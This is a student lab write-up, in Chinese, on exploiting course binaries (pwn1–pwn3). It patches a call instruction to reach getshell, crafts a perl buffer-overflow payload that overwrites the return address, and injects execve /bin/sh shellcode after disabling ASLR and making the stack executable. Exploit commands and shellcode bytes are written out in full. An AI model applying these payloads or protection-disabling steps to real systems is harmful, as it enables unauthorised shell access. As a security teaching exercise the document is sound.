实验模块
实验准备
设置共享文件夹(这一步我已经在之前安装kali的时候做好了)
将老师提供的
pwn1文件通过共享文件夹传到kali上以便以后使用。将
pwn1文件复制到主目录下,并进行备份输入
apt-get install lib32z1指令,使64位kali可以运行32位程序
知识点描述
- 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
- 掌握反汇编与十六进制编程器
- 能正确修改机器指令改变程序执行流程
- 能正确构造payload进行bof攻击
任务一 直接修改程序机器指令,改变程序执行流程
通过修改main函数中的call指令跳转的地址,使其本来该跳转到foo函数时,跳转到getshell函数,从而运行getshell函数。
注:call指令的机器码为e8,其跳转的位置为寄存器eip的值+call指令后的立即数
1.输入指令objdump -d pwn1 | more反汇编pwn1文件。
通过反汇编,可以看到main函数中的call 804891<foo>,其机器码为e8 d7 ff ff ff。
其中foo函数的地址为08048491,getshell函数的地址为0804847d,通过计算其对应关系(小端机器)
0x08048491 - 0x0804847d = 0x00000014 //计算地址差
0xffffffd7 - 0x00000014 = 0xffffffc3 //计算要修改的目标地址
2.输入指令vi pwn1打开文件
打开之后我们会看到文件以ASCII码的形式出现
3.输入:%!xxd通过调用命令行,将文件转换为16进制查看
4.使用/d7命令寻找e8d7ffffff机器指令所在位置
5.找到后,输入i进入插入模式,将d7修改为c3
6.输入:%!xxd -r将文件转换为ASCII码形式(一定要转换,否则会出问题),输入:wq保存并退出
7.此时输入指令objdump -d pwn1 | more查看,可以发现pwn1文件已经被修改了
8.运行pwn1文件和pwn1.0文件(pwn1文件是被修改过的,pwn1.0文件是原始的未被修改过的),可以发现两个文件的运行结果是截然不同的。
实验成功!!!
任务二 通过构造输入参数,造成BOF攻击,改变程序执行流
pwn2 正常运行是调用函数foo,但是这个函数有Bufferoverflow漏洞。读入字符串时,系统只预留了一定字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址。尝试发现,当输入为以下字符时已经发生段错误,产生溢出。
1.输入指令objdump -d pwn2 | more查看,计算要达到缓冲区溢出说需要输入的字符数
由上图可以推测,需要输入的字节大约在32字节,下面对其进行验证
2.打开一个终端进入gdb,输入字符串1111111122222222333333334444444412345555,观察一下各寄存器的值
从上图可以看到eip寄存器中的值为0x34333231,对应字符串中的1234。
由此可见,如果输入字符串1111111122222222333333334444444412345555,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getshell 的内存地址,输给pwn2,pwn2就会运行getshell。
getshell函数的地址为:0x0804847d,由于输入字符串时是以ASCII码输入,因此要转换为\x7d\x84\x04\x08,并需要使用Perl语言构造文件(Perl是一门解释型语言,不需要预编译,可以在命令行上直接使用)。
3.输入perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > BOF.1
4.输入xxd BOF.1查看内容
5.通过管道符|,作为pwn1的输入,格式为(cat BOF.1; cat ) | ./pwn2。
攻击成功!!!
任务三 注入Shellcode并运行攻击
shellcode就是一段机器指令(code),通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
1.输入指令apt-get install execstack安装execstack
并设置堆栈可执行:
execstack -s pwn3 //设置堆栈可执行
execstack -q pwn3 //查询文件的堆栈是否可执行
2.关闭地址随机化(如果不关闭的话,每次操作esp的地址都会发生变化)
more /proc/sys/kernel/randomize_va_space //查看随机化是否关闭
echo "0" > /proc/sys/kernel/randomize_va_space //关闭随机化
(“2”为开启,“0”为关闭)
3.我们需要注入一段代码,我们首先构造一个input_shellcode(参考老师给的代码):
perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
4.在一个窗口运行(cat input_shellcode;cat) | ./pwn3
5.在另外一个窗口ps -ef | grep pwn能看见当前运行pwn3的进程号为2396;
6.在gdb里面attach 2396进行调试
7.disassemble foo反编译
8.可以看到ret指令的地址为0x080484ae,在此处设置断点break *0x080484ae
9.在另一个终端按下回车,这样程序就会执行之后在断点处停下来
10.再在gdb调试的终端输入 c 继续运行程序
11.info r esp查看esp寄存器地址
12.x/16x 0xffffd34c以16进制形式查看0xffffd34c地址后面16字节的内容
从上图中看到 01020304所在的地址为0xffffd34c,那么注入的shellcode代码的地址应该在该ret指令地址后四个字节的位置,即0xffffd34c + 0x00000004 = 0xffffd350。随后退出gdb调试。
13.修改注入代码的覆盖地址perl -e 'print "A" x 32;print"\x50\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
14.输入命令(cat input_shellcode;cat) | ./pwn3
攻击成功!!!
遇到的问题及解决方法
问题:在64位kali上运行pwn1时,出现以下问题。
解决方法:参考64位Kali无法顺利执行pwn1问题的解决方案,输入
apt-get install lib32z1指令,使64位kali可以运行32位程序。
实验收获与感想
- 我的收获
- 什么是漏洞?漏洞有什么危害?